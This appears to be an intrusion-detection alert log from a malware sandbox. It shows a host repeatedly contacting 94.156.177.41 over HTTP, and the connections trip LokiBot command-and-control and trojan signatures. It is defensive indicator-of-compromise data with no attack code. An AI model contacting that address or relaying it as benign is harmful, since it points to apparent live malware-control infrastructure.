2025-01-11T08:38:11.003703+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:11.883164+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:12.778136+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:13.686751+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:14.556486+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:15.572731+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:16.449634+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:17.326715+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:18.200103+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:19.084044+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:19.943174+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:20.836464+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:22.072417+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:22.938811+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:23.775451+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:24.924940+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:25.792727+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:26.667801+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:27.819161+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:28.682413+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:29.679562+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:30.528984+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:31.418232+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:32.294702+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:33.203940+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:34.375337+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:35.360232+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:36.209960+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:37.179276+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:38.042783+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:38.912153+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:39.956976+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:40.858919+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:41.746972+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:42.661261+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:43.538124+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:44.418883+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:45.460503+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:46.349034+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:47.254357+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:48.123391+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:48.972039+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:49.816159+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:50.672196+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:51.546237+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:52.407655+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:53.255014+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:54.122050+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50085	94.156.177.41	80	TCP
2025-01-11T08:38:54.976683+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:55.873721+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:56.740058+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:57.718537+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:58.557574+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:59.435116+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:39:00.362103+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:39:01.205421+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:02.212934+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:03.191625+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:04.061459+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:04.924708+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:05.834626+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:06.824285+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:07.710239+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:08.598891+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:09.507655+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:10.394621+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:11.312423+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:12.212304+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.9	50105	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:37:17.283199+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:18.596493+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49811	94.156.177.41	80	TCP
2025-01-11T08:37:19.430625+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:20.295163+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49828	94.156.177.41	80	TCP
2025-01-11T08:37:21.333703+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:22.217012+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:23.102371+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:24.122123+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:25.027858+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:25.900548+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:26.766848+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:27.644318+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:28.555245+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:29.427877+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:30.321553+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:31.243472+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:32.132348+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:33.035370+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:33.901353+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:34.780300+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:35.656565+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:36.542434+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:37.413981+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:38.278632+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:39.298255+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:40.160259+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:41.027625+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:41.877046+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:42.766186+0100	2021641	1	A Network Trojan was detected	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:43.647766+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:44.509809+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:45.351886+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:46.247938+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:47.141186+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:47.993044+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:48.851758+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:49.710358+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:50.589002+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:51.533742+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:52.420648+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:53.281289+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:54.149795+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-11T08:37:55.447402+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:56.296589+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:57.168024+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:58.108290+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:58.997732+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:37:59.881352+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:38:00.923865+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:01.801642+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:02.929554+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:03.788440+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:04.654751+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:05.736766+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:06.637553+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-11T08:38:07.543493+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:08.535138+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:09.430836+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-11T08:38:10.296978+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:11.151744+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:12.040089+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:12.949663+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:13.842179+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:14.714006+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:15.727832+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:16.602139+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:17.480431+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:18.361971+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:19.243600+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:20.125882+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:21.374944+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:22.229791+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:23.088593+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:24.220880+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:25.073323+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:25.957719+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:26.972510+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:27.976208+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:28.837379+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:29.840822+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:30.693073+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:31.577126+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:32.460501+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:33.646503+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:34.530472+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:35.510279+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:36.471295+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:37.336378+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:38.202393+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:39.238877+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:40.130128+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:41.012348+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:41.968094+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:42.823353+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:43.698121+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:44.595801+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:45.627870+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:46.516711+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:47.424671+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:48.273476+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:49.116902+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:49.960016+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:50.825321+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:51.695758+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:52.555444+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:53.414347+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50085	94.156.177.41	80	TCP
2025-01-11T08:38:54.273813+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:55.134435+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:56.036472+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:56.987645+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:57.870196+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:58.710492+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:38:59.655514+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:39:00.512250+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:01.365444+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:02.473916+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:03.353242+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:04.211638+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:05.111899+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:06.002182+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:06.979552+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:07.899333+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:08.814632+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:09.685224+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:10.558443+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:11.462948+0100	2021641	1	A Network Trojan was detected	192.168.2.9	50105	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T08:37:17.283199+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49804	94.156.177.41	80	TCP
2025-01-11T08:37:18.596493+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49811	94.156.177.41	80	TCP
2025-01-11T08:37:19.430625+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49817	94.156.177.41	80	TCP
2025-01-11T08:37:20.295163+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49828	94.156.177.41	80	TCP
2025-01-11T08:37:21.333703+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:22.217012+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:23.102371+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:24.122123+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:25.027858+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:25.900548+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:26.766848+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:27.644318+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:28.555245+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:29.427877+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:30.321553+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:31.243472+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:32.132348+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:33.035370+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:33.901353+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:34.780300+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:35.656565+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:36.542434+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:37.413981+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:38.278632+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:39.298255+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:40.160259+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:41.027625+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:41.877046+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:42.766186+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:43.647766+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:44.509809+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:45.351886+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:46.247938+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:47.141186+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:47.993044+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:48.851758+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:49.710358+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:50.589002+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:51.533742+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:52.420648+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:53.281289+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:54.149795+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50020	94.156.177.41	80	TCP
